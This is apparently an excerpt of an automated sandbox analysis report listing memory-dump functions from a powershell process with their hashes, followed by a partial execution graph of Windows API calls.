                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.1699862592.00007FFAAB190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7ffaab190000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bd2a0c18a3356c47228b70da948d72d8a3260114439cdf963fde16a45e612225
                                                                                          • Instruction ID: 7995513bbb3ee99eba474aef2ac9bd2c03867721be9f1fd1274b5b0f2b4a9e75
                                                                                          • Opcode Fuzzy Hash: bd2a0c18a3356c47228b70da948d72d8a3260114439cdf963fde16a45e612225
                                                                                          • Instruction Fuzzy Hash: 9B210471B09A498FEBA9DF1CD4449B873E0FF99354B04417EE04EC32A2CE39E8058780
                                                                                          Function 00007FFAAB0C4A84 Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.1699311315.00007FFAAB0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7ffaab0c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8d9e343436722dc269d5396eb9abf7d0f66419bd7be224cc88fe141193141ff4
                                                                                          • Instruction ID: 973a71709bef68d9fb6ef7ec1d182aee9ce48446464040c0f34754bce2426612
                                                                                          • Opcode Fuzzy Hash: 8d9e343436722dc269d5396eb9abf7d0f66419bd7be224cc88fe141193141ff4
                                                                                          • Instruction Fuzzy Hash: 9401FC3130CB048FD798DF1CE492A79B3E0FB99360F10056DE08AC3696DA36E841C745
                                                                                          Function 00007FFAAB0C3A05 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.1699311315.00007FFAAB0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7ffaab0c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                                                                          • Instruction ID: 496cac4e6eedf4d3165fa0247c1515ef79a3e49e57106dd227045c6e68fd9bef
                                                                                          • Opcode Fuzzy Hash: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                                                                          • Instruction Fuzzy Hash: A201677111CB0C8FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661D736E891CB45
                                                                                          Function 00007FFAAB1904D8 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.1699862592.00007FFAAB190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB190000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7ffaab190000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 31775d144bbc49ad2672617c6f9d6ec2489d80e219af7d60f6f440b54ee9f06b
                                                                                          • Instruction ID: 8925fe2b485c272d40135ab2feff136a0860dfbaa1b777c0a402c49ff5255532
                                                                                          • Opcode Fuzzy Hash: 31775d144bbc49ad2672617c6f9d6ec2489d80e219af7d60f6f440b54ee9f06b
                                                                                          • Instruction Fuzzy Hash: 79E0D833E0E96D4EF7A2E6DC641D1F86681EF566B574441B7D50CE3151DC059C1443C1

                                                                                          Non-executed Functions

                                                                                          Function 00007FFAAB0C6C6B Relevance: .2, Instructions: 176COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.1699311315.00007FFAAB0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7ffaab0c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a27db7b68de80596a3296354dbf6c555037d5bcd199e90511680b00db9c2f2a6
                                                                                          • Instruction ID: 42e7324c7adbe4af3147584d4bdf9dee0e4f71d60fa719e8d6307027d68e380d
                                                                                          • Opcode Fuzzy Hash: a27db7b68de80596a3296354dbf6c555037d5bcd199e90511680b00db9c2f2a6
                                                                                          • Instruction Fuzzy Hash: 5F51C857E0E7D38EE353677DA4A64E53F24EF4319570981F7C48E8E0A3AD09285E82A1
                                                                                          Function 00007FFAAB0C64D3 Relevance: .2, Instructions: 176COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.1699311315.00007FFAAB0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7ffaab0c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: af3594464a1284a2af9da1e446ce86095cb384c892a42458742daf308d3b7a7a
                                                                                          • Instruction ID: ddb4411d8633ec67e53223919b871a373721984d9cff696f19b4d3883bfe36a9
                                                                                          • Opcode Fuzzy Hash: af3594464a1284a2af9da1e446ce86095cb384c892a42458742daf308d3b7a7a
                                                                                          • Instruction Fuzzy Hash: 7F518753D0D3934EE353AB7CA4B69E53F249F43299B1D81F7C48E8E0A7DD18284983A5
                                                                                          Function 00007FFAAB0C0750 Relevance: 8.9, Strings: 7, Instructions: 113COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.1699311315.00007FFAAB0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB0C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_7ffaab0c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (0$8,$H1$P/$p0$-$/
                                                                                          • API String ID: 0-1703415966
                                                                                          • Opcode ID: 7fe72adcf3573969ef5daacc9f0e3f477b9baaecc0556e12d011adcd3c4205a8
                                                                                          • Instruction ID: ff717ff6f35fc61abe8fb2062e038f6cb773b826206e4ae8d90351cec8042df3
                                                                                          • Opcode Fuzzy Hash: 7fe72adcf3573969ef5daacc9f0e3f477b9baaecc0556e12d011adcd3c4205a8
                                                                                          • Instruction Fuzzy Hash: CE31C383D0FAD14FF22A43AC28151A95E91EB53390B28C4FBE0CC469EFA9449D0DC3C1

                                                                                          Execution Graph

                                                                                          Execution Coverage:2.4%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:5.9%
                                                                                          Total number of Nodes:1427
                                                                                          Total number of Limit Nodes:40
                                                                                          execution_graph 93339 7ff74d058fac 93340 7ff74d05901c 93339->93340 93341 7ff74d058fd2 GetModuleHandleW 93339->93341 93356 7ff74d06b9bc EnterCriticalSection 93340->93356 93341->93340 93346 7ff74d058fdf 93341->93346 93343 7ff74d06ba10 _isindst LeaveCriticalSection 93344 7ff74d0590f0 93343->93344 93349 7ff74d059118 11 API calls 93344->93349 93355 7ff74d0590fc 93344->93355 93345 7ff74d059026 93348 7ff74d0590a0 93345->93348 93350 7ff74d06aa8c 30 API calls 93345->93350 93354 7ff74d0590cb 93345->93354 93346->93340 93357 7ff74d059164 GetModuleHandleExW 93346->93357 93347 7ff74d0590b8 93353 7ff74d06ada4 75 API calls 93347->93353 93348->93347 93352 7ff74d06ada4 75 API calls 93348->93352 93349->93355 93350->93348 93352->93347 93353->93354 93354->93343 93358 7ff74d05918e GetProcAddress 93357->93358 93359 7ff74d0591b5 93357->93359 93358->93359 93360 7ff74d0591a8 93358->93360 93361 7ff74d0591c5 93359->93361 93362 7ff74d0591bf FreeLibrary 93359->93362 93360->93359 93361->93340 93362->93361 93363 7ff74d08f890 93372 7ff74d03e18c 93363->93372 93365 7ff74d08f8a9 93369 7ff74d08f915 Concurrency::wait 93365->93369 93378 7ff74d052ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93365->93378 93367 7ff74d08f8f6 93367->93369 93379 7ff74d0b1464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93367->93379 93370 7ff74d0903e1 Concurrency::wait 93369->93370 93380 7ff74d0b34e4 77 API calls 3 library calls 93369->93380 93373 7ff74d03e1a7 93372->93373 93374 7ff74d03e1c2 93372->93374 93381 7ff74d03ee20 5 API calls Concurrency::wait 93373->93381 93376 7ff74d03e1af 93374->93376 93382 7ff74d03ee20 5 API calls Concurrency::wait 93374->93382 93376->93365 93378->93367 93380->93370 93381->93376 93382->93376 93383 7ff74d08b221 93384 7ff74d08b22a 93383->93384 93391 7ff74d040378 93383->93391 93406 7ff74d0a47bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93384->93406 93386 7ff74d08b241 93407 7ff74d0a4708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93386->93407 93388 7ff74d08b264 93408 7ff74d043c20 93388->93408 93390 7ff74d08b292 93397 7ff74d040405 93390->93397 93429 7ff74d0c8d98 49 API calls Concurrency::wait 93390->93429 93400 7ff74d03f7b8 93391->93400 93394 7ff74d08b2d9 Concurrency::wait 93394->93391 93430 7ff74d0a47bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93394->93430 93398 7ff74d04070a 93397->93398 93399 7ff74d03e0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93397->93399 93431 7ff74d03ee20 5 API calls Concurrency::wait 93397->93431 93399->93397 93404 7ff74d03f7d5 93400->93404 93401 7ff74d03f7de 93401->93397 93404->93401 93405 7ff74d03f7b8 4 API calls 93404->93405 93432 7ff74d039640 93404->93432 93435 7ff74d03e0a8 93404->93435 93405->93404 93406->93386 93407->93388 93411 7ff74d043c80 93408->93411 93409 7ff74d054f0c 34 API calls __scrt_initialize_thread_safe_statics 93409->93411 93410 7ff74d0905be 93451 7ff74d0b34e4 77 API calls 3 library calls 93410->93451 93411->93409 93411->93410 93413 7ff74d043dde 93411->93413 93414 7ff74d044aa9 93411->93414 93415 7ff74d044a8f 93411->93415 93418 7ff74d044fe7 93411->93418 93422 7ff74d03e0a8 4 API calls 93411->93422 93426 7ff74d055114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93411->93426 93427 7ff74d039640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93411->93427 93428 7ff74d0550b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 93411->93428 93449 7ff74d045360 300 API calls Concurrency::wait 93411->93449 93450 7ff74d0b34e4 77 API calls 3 library calls 93411->93450 93413->93390 93419 7ff74d03e0a8 4 API calls 93414->93419 93424 7ff74d044ac0 93414->93424 93415->93414 93420 7ff74d08fefe 93415->93420 93415->93424 93417 7ff74d0905d1 93417->93390 93421 7ff74d03e0a8 4 API calls 93418->93421 93419->93413 93423 7ff74d03e0a8 4 API calls 93420->93423 93421->93413 93422->93411 93423->93424 93424->93390 93426->93411 93427->93411 93428->93411 93429->93394 93430->93394 93431->93397 93439 7ff74d054c68 93432->93439 93434 7ff74d039663 93434->93404 93436 7ff74d03e0bb 93435->93436 93437 7ff74d03e0b6 93435->93437 93436->93404 93448 7ff74d03f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93437->93448 93444 7ff74d054c2c 93439->93444 93440 7ff74d054c50 93440->93434 93444->93439 93444->93440 93445 7ff74d05925c EnterCriticalSection LeaveCriticalSection abort 93444->93445 93446 7ff74d055600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 93444->93446 93447 7ff74d055620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 93444->93447 93445->93444 93447->93444 93448->93436 93449->93411 93450->93411 93451->93417 93452 7ff74d042bf8 93455 7ff74d03ed44 93452->93455 93454 7ff74d042c05 93456 7ff74d03edcd 93455->93456 93457 7ff74d03ed75 93455->93457 93462 7ff74d03edfe 93456->93462 93465 7ff74d0b34e4 77 API calls 3 library calls 93456->93465 93457->93456 93459 7ff74d043c20 300 API calls 93457->93459 93461 7ff74d03eda8 93459->93461 93460 7ff74d08a636 93461->93462 93464 7ff74d03ee20 5 API calls Concurrency::wait 93461->93464 93462->93454 93464->93456 93465->93460 93466 7ff74d042c17 93469 7ff74d0414a0 93466->93469 93468 7ff74d042c2a 93470 7ff74d0414d3 93469->93470 93471 7ff74d08be31 93470->93471 93474 7ff74d08bdd1 93470->93474 93475 7ff74d08bdf2 93470->93475 93488 7ff74d0414fa __scrt_get_show_window_mode 93470->93488 93517 7ff74d0c8f48 300 API calls 3 library calls 93471->93517 93477 7ff74d08bddb 93474->93477 93474->93488 93476 7ff74d08be19 93475->93476 93515 7ff74d0c9a88 300 API calls 4 library calls 93475->93515 93516 7ff74d0b34e4 77 API calls 3 library calls 93476->93516 93514 7ff74d0c9514 300 API calls 93477->93514 93479 7ff74d041884 93505 7ff74d052130 45 API calls 93479->93505 93485 7ff74d041815 93485->93468 93486 7ff74d041898 93486->93468 93488->93479 93488->93485 93489 7ff74d052130 45 API calls 93488->93489 93493 7ff74d041a30 45 API calls 93488->93493 93496 7ff74d08bfe4 93488->93496 93497 7ff74d043c20 300 API calls 93488->93497 93500 7ff74d03e0a8 4 API calls 93488->93500 93501 7ff74d041799 93488->93501 93504 7ff74d03ef9c 46 API calls 93488->93504 93506 7ff74d0520d0 45 API calls 93488->93506 93507 7ff74d035af8 300 API calls 93488->93507 93508 7ff74d055114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93488->93508 93509 7ff74d0535c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93488->93509 93510 7ff74d054f0c 34 API calls _onexit 93488->93510 93511 7ff74d0550b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93488->93511 93512 7ff74d0536c4 77 API calls 93488->93512 93513 7ff74d0537dc 300 API calls 93488->93513 93518 7ff74d03ee20 5 API calls Concurrency::wait 93488->93518 93519 7ff74d09ac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93488->93519 93489->93488 93493->93488 93520 7ff74d0c93a4 77 API calls 93496->93520 93497->93488 93500->93488 93501->93485 93521 7ff74d0b34e4 77 API calls 3 library calls 93501->93521 93504->93488 93505->93486 93506->93488 93507->93488 93509->93488 93510->93488 93512->93488 93513->93488 93514->93485 93515->93476 93516->93471 93517->93488 93518->93488 93519->93488 93520->93501 93521->93501 93522 7ff74d06c51c 93523 7ff74d06c567 93522->93523 93527 7ff74d06c52b abort 93522->93527 93530 7ff74d0655d4 15 API calls abort 93523->93530 93525 7ff74d06c54e HeapAlloc 93526 7ff74d06c565 93525->93526 93525->93527 93527->93523 93527->93525 93529 7ff74d05925c EnterCriticalSection LeaveCriticalSection abort 93527->93529 93529->93527 93530->93526 93531 7ff74d08e263 93532 7ff74d08e271 93531->93532 93542 7ff74d042680 93531->93542 93532->93532 93533 7ff74d0429c8 PeekMessageW 93533->93542 93534 7ff74d0426da GetInputState 93534->93533 93534->93542 93536 7ff74d08d181 TranslateAcceleratorW 93536->93542 93537 7ff74d042a1f TranslateMessage DispatchMessageW 93538 7ff74d042a33 PeekMessageW 93537->93538 93538->93542 93539 7ff74d0428b9 timeGetTime 93539->93542 93540 7ff74d08d2bb timeGetTime 93598 7ff74d052ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93540->93598 93542->93533 93542->93534 93542->93536 93542->93537 93542->93538 93542->93539 93542->93540 93547 7ff74d042856 93542->93547 93548 7ff74d043c20 300 API calls 93542->93548 93549 7ff74d0b34e4 77 API calls 93542->93549 93551 7ff74d042b70 93542->93551 93558 7ff74d0466c0 93542->93558 93592 7ff74d052de8 93542->93592 93597 7ff74d042e30 300 API calls 2 library calls 93542->93597 93599 7ff74d0b3a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93542->93599 93600 7ff74d0ca320 300 API calls Concurrency::wait 93542->93600 93548->93542 93549->93542 93552 7ff74d042ba9 93551->93552 93553 7ff74d042b96 93551->93553 93621 7ff74d0b34e4 77 API calls 3 library calls 93552->93621 93601 7ff74d042050 93553->93601 93555 7ff74d042b9e 93555->93542 93557 7ff74d08e55c 93574 7ff74d04673b memcpy_s Concurrency::wait 93558->93574 93560 7ff74d091fac 93756 7ff74d0cab30 300 API calls Concurrency::wait 93560->93756 93562 7ff74d091fbe 93562->93542 93564 7ff74d046c0f 93565 7ff74d091fc9 93564->93565 93566 7ff74d046c3d 93564->93566 93757 7ff74d0b34e4 77 API calls 3 library calls 93565->93757 93753 7ff74d03ee20 5 API calls Concurrency::wait 93566->93753 93570 7ff74d046c4a 93754 7ff74d051fcc 300 API calls 93570->93754 93572 7ff74d046c78 93755 7ff74d04e8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93572->93755 93574->93560 93574->93564 93574->93565 93574->93570 93574->93572 93575 7ff74d054c68 4 API calls 93574->93575 93576 7ff74d046d40 9 API calls 93574->93576 93579 7ff74d043c20 300 API calls 93574->93579 93580 7ff74d092032 93574->93580 93582 7ff74d03e0a8 4 API calls 93574->93582 93583 7ff74d0920c1 93574->93583 93584 7ff74d046b15 93574->93584 93627 7ff74d0b8ea0 93574->93627 93660 7ff74d0b63dc 93574->93660 93665 7ff74d0b7e48 93574->93665 93699 7ff74d0cf160 93574->93699 93704 7ff74d0b5b80 93574->93704 93710 7ff74d0b8e98 93574->93710 93743 7ff74d0cf0ac 93574->93743 93746 7ff74d055114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93574->93746 93747 7ff74d03ec00 93574->93747 93752 7ff74d0550b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93574->93752 93759 7ff74d0c8d98 49 API calls Concurrency::wait 93574->93759 93575->93574 93576->93574 93579->93574 93758 7ff74d0b34e4 77 API calls 3 library calls 93580->93758 93582->93574 93583->93584 93760 7ff74d0b34e4 77 API calls 3 library calls 93583->93760 93584->93542 93593 7ff74d052e0d 93592->93593 93594 7ff74d052e2a 93592->93594 93593->93542 93594->93593 93595 7ff74d052e5b IsDialogMessageW 93594->93595 93596 7ff74d099d94 GetClassLongPtrW 93594->93596 93595->93593 93595->93594 93596->93594 93596->93595 93597->93542 93598->93542 93599->93542 93600->93542 93602 7ff74d043c20 300 API calls 93601->93602 93605 7ff74d0420a8 93602->93605 93603 7ff74d04212d 93603->93555 93605->93603 93607 7ff74d042552 93605->93607 93614 7ff74d042244 93605->93614 93615 7ff74d08d06f 93605->93615 93617 7ff74d0422a5 memcpy_s 93605->93617 93618 7ff74d0423cb memcpy_s 93605->93618 93606 7ff74d08d08d 93609 7ff74d054c68 4 API calls 93607->93609 93608 7ff74d08d036 93624 7ff74d03ee20 5 API calls Concurrency::wait 93608->93624 93609->93618 93611 7ff74d054c68 4 API calls 93611->93617 93612 7ff74d08d062 93625 7ff74d03ee20 5 API calls Concurrency::wait 93612->93625 93614->93618 93622 7ff74d041ce4 301 API calls Concurrency::wait 93614->93622 93626 7ff74d0b34e4 77 API calls 3 library calls 93615->93626 93617->93611 93617->93618 93618->93608 93620 7ff74d0b34e4 77 API calls 93618->93620 93623 7ff74d034a60 300 API calls 93618->93623 93620->93618 93621->93557 93622->93617 93623->93618 93624->93612 93625->93615 93626->93606 93628 7ff74d0ba680 93627->93628 93634 7ff74d0ba71a 93628->93634 93798 7ff74d03834c 93628->93798 93630 7ff74d0ba6f3 93630->93574 93632 7ff74d0ba7fd 93839 7ff74d0b1864 6 API calls 93632->93839 93633 7ff74d03d4cc 48 API calls 93635 7ff74d0ba6d0 93633->93635 93634->93630 93634->93632 93639 7ff74d0ba770 93634->93639 93807 7ff74d036838 93635->93807 93638 7ff74d0ba805 93840 7ff74d0ab334 93638->93840 93761 7ff74d03d4cc 93639->93761 93641 7ff74d0ba6e6 93641->93630 93823 7ff74d037ab8 93641->93823 93645 7ff74d0ba7ee 93780 7ff74d0ab3a8 93645->93780 93646 7ff74d0ba7a7 93826 7ff74d0398e8 93646->93826 93649 7ff74d0ba7b5 93651 7ff74d03e0a8 4 API calls 93649->93651 93654 7ff74d0ba7c2 93651->93654 93653 7ff74d0ba778 93653->93645 93653->93646 93829 7ff74d0371f8 93654->93829 93656 7ff74d037ab8 CloseHandle 93656->93630 93657 7ff74d0ba7d3 93658 7ff74d0ab3a8 12 API calls 93657->93658 93659 7ff74d0ba7e0 Concurrency::wait 93658->93659 93659->93630 93843 7ff74d038314 93659->93843 93661 7ff74d03d4cc 48 API calls 93660->93661 93662 7ff74d0b63f8 93661->93662 93876 7ff74d0abdec 93662->93876 93664 7ff74d0b6404 93664->93574 93666 7ff74d0b7e79 93665->93666 93667 7ff74d039640 4 API calls 93666->93667 93696 7ff74d0b7f55 Concurrency::wait 93666->93696 93668 7ff74d0b7ea6 93667->93668 93670 7ff74d039640 4 API calls 93668->93670 93669 7ff74d03834c 5 API calls 93671 7ff74d0b7f99 93669->93671 93672 7ff74d0b7eaf 93670->93672 93673 7ff74d03d4cc 48 API calls 93671->93673 93674 7ff74d03d4cc 48 API calls 93672->93674 93675 7ff74d0b7fab 93673->93675 93676 7ff74d0b7ebe 93674->93676 93677 7ff74d036838 16 API calls 93675->93677 93884 7ff74d0374ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 93676->93884 93679 7ff74d0b7fba 93677->93679 93681 7ff74d0b7fbe GetLastError 93679->93681 93685 7ff74d0b7ff5 93679->93685 93680 7ff74d0b7ed8 93885 7ff74d037c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 93680->93885 93683 7ff74d0b7fd8 93681->93683 93686 7ff74d037ab8 CloseHandle 93683->93686 93692 7ff74d0b7fe5 93683->93692 93684 7ff74d0b7f07 93684->93696 93886 7ff74d0abdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 93684->93886 93687 7ff74d039640 4 API calls 93685->93687 93686->93692 93690 7ff74d0b8035 93687->93690 93689 7ff74d0b7f17 93691 7ff74d0b7f1b 93689->93691 93689->93696 93690->93692 93888 7ff74d0a0d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93690->93888 93694 7ff74d03ec00 4 API calls 93691->93694 93692->93574 93695 7ff74d0b7f28 93694->93695 93887 7ff74d0abab8 8 API calls Concurrency::wait 93695->93887 93696->93669 93696->93692 93698 7ff74d0b7f31 Concurrency::wait 93698->93696 93889 7ff74d0cf630 93699->93889 93701 7ff74d0cf1cd 93701->93574 93702 7ff74d0cf182 93702->93701 93957 7ff74d03ee20 5 API calls Concurrency::wait 93702->93957 93705 7ff74d0b5ba5 93704->93705 93706 7ff74d0b5be5 FindClose 93705->93706 93707 7ff74d0b5ba9 93705->93707 93708 7ff74d0b5bd5 93705->93708 93706->93707 93707->93574 93708->93707 93709 7ff74d037ab8 CloseHandle 93708->93709 93709->93707 93711 7ff74d0ba680 93710->93711 93712 7ff74d03834c 5 API calls 93711->93712 93713 7ff74d0ba71a 93711->93713 93714 7ff74d0ba6be 93712->93714 93715 7ff74d0ba7fd 93713->93715 93716 7ff74d0ba6f3 93713->93716 93722 7ff74d0ba770 93713->93722 93717 7ff74d03d4cc 48 API calls 93714->93717 93986 7ff74d0b1864 6 API calls 93715->93986 93716->93574 93718 7ff74d0ba6d0 93717->93718 93720 7ff74d036838 16 API calls 93718->93720 93723 7ff74d0ba6e2 93720->93723 93721 7ff74d0ba805 93726 7ff74d0ab334 4 API calls 93721->93726 93725 7ff74d03d4cc 48 API calls 93722->93725 93723->93713 93724 7ff74d0ba6e6 93723->93724 93724->93716 93727 7ff74d037ab8 CloseHandle 93724->93727 93732 7ff74d0ba778 93725->93732 93742 7ff74d0ba7e0 Concurrency::wait 93726->93742 93727->93716 93728 7ff74d0ba7ee 93730 7ff74d0ab3a8 12 API calls 93728->93730 93729 7ff74d0ba7a7 93731 7ff74d0398e8 4 API calls 93729->93731 93730->93742 93733 7ff74d0ba7b5 93731->93733 93732->93728 93732->93729 93735 7ff74d03e0a8 4 API calls 93733->93735 93734 7ff74d038314 CloseHandle 93736 7ff74d0ba85c 93734->93736 93737 7ff74d0ba7c2 93735->93737 93736->93716 93739 7ff74d037ab8 CloseHandle 93736->93739 93738 7ff74d0371f8 4 API calls 93737->93738 93740 7ff74d0ba7d3 93738->93740 93739->93716 93741 7ff74d0ab3a8 12 API calls 93740->93741 93741->93742 93742->93716 93742->93734 93744 7ff74d0cf630 164 API calls 93743->93744 93745 7ff74d0cf0c2 93744->93745 93745->93574 93748 7ff74d03ec1d 93747->93748 93749 7ff74d08a5a2 93748->93749 93750 7ff74d054c68 4 API calls 93748->93750 93751 7ff74d03ec55 memcpy_s 93750->93751 93751->93574 93753->93570 93754->93572 93755->93572 93756->93562 93757->93584 93758->93584 93759->93574 93760->93584 93762 7ff74d03d50b 93761->93762 93763 7ff74d03d4f2 93761->93763 93764 7ff74d03d53e 93762->93764 93765 7ff74d03d513 93762->93765 93763->93653 93766 7ff74d089cc4 93764->93766 93768 7ff74d03d550 93764->93768 93774 7ff74d089bbc 93764->93774 93846 7ff74d05956c 31 API calls 93765->93846 93849 7ff74d059538 31 API calls 93766->93849 93847 7ff74d054834 46 API calls 93768->93847 93770 7ff74d03d522 93775 7ff74d03ec00 4 API calls 93770->93775 93772 7ff74d089cdc 93776 7ff74d054c68 4 API calls 93774->93776 93779 7ff74d089c3e Concurrency::wait wcscpy 93774->93779 93775->93763 93777 7ff74d089c0a 93776->93777 93778 7ff74d03ec00 4 API calls 93777->93778 93778->93779 93848 7ff74d054834 46 API calls 93779->93848 93781 7ff74d0ab42a 93780->93781 93782 7ff74d0ab3c8 93780->93782 93785 7ff74d0ab334 4 API calls 93781->93785 93783 7ff74d0ab3d0 93782->93783 93784 7ff74d0ab41e 93782->93784 93787 7ff74d0ab3f1 93783->93787 93788 7ff74d0ab3dd 93783->93788 93857 7ff74d0ab458 8 API calls 93784->93857 93797 7ff74d0ab410 Concurrency::wait 93785->93797 93855 7ff74d03a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93787->93855 93853 7ff74d03a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93788->93853 93791 7ff74d0ab3f6 93856 7ff74d0ab270 6 API calls 93791->93856 93792 7ff74d0ab3e2 93854 7ff74d054120 6 API calls 93792->93854 93795 7ff74d0ab3ef 93850 7ff74d0ab384 93795->93850 93797->93659 93799 7ff74d054c68 4 API calls 93798->93799 93800 7ff74d038363 93799->93800 93801 7ff74d038314 CloseHandle 93800->93801 93802 7ff74d03836f 93801->93802 93803 7ff74d039640 4 API calls 93802->93803 93804 7ff74d038378 93803->93804 93805 7ff74d038314 CloseHandle 93804->93805 93806 7ff74d038380 93805->93806 93806->93633 93808 7ff74d038314 CloseHandle 93807->93808 93809 7ff74d03685a 93808->93809 93810 7ff74d03687d CreateFileW 93809->93810 93811 7ff74d07caa8 93809->93811 93816 7ff74d0368ab 93810->93816 93812 7ff74d07caae CreateFileW 93811->93812 93819 7ff74d0368d9 93811->93819 93813 7ff74d07cae6 93812->93813 93812->93816 93860 7ff74d036a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 93813->93860 93815 7ff74d07caf3 93815->93816 93822 7ff74d0368e4 93816->93822 93858 7ff74d0368f4 9 API calls 93816->93858 93818 7ff74d0368c1 93818->93819 93859 7ff74d036a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 93818->93859 93820 7ff74d0ab334 4 API calls 93819->93820 93819->93822 93820->93822 93822->93634 93822->93641 93861 7ff74d0382e4 93823->93861 93827 7ff74d054c68 4 API calls 93826->93827 93828 7ff74d039918 93827->93828 93828->93649 93830 7ff74d03721c 93829->93830 93834 7ff74d07cd0c 93829->93834 93831 7ff74d037274 93830->93831 93836 7ff74d07cd66 memcpy_s 93830->93836 93866 7ff74d03b960 93831->93866 93833 7ff74d037283 memcpy_s 93833->93657 93835 7ff74d054c68 4 API calls 93834->93835 93835->93836 93837 7ff74d054c68 4 API calls 93836->93837 93838 7ff74d07cdda memcpy_s 93837->93838 93839->93638 93871 7ff74d0ab188 93840->93871 93844 7ff74d03832a 93843->93844 93845 7ff74d03833d CloseHandle 93843->93845 93844->93630 93844->93656 93845->93844 93846->93770 93847->93770 93848->93766 93849->93772 93851 7ff74d0ab334 4 API calls 93850->93851 93852 7ff74d0ab399 93851->93852 93852->93797 93853->93792 93854->93795 93855->93791 93856->93795 93857->93797 93858->93818 93859->93819 93860->93815 93862 7ff74d038314 CloseHandle 93861->93862 93863 7ff74d0382f2 Concurrency::wait 93862->93863 93864 7ff74d038314 CloseHandle 93863->93864 93865 7ff74d038303 93864->93865 93867 7ff74d03b981 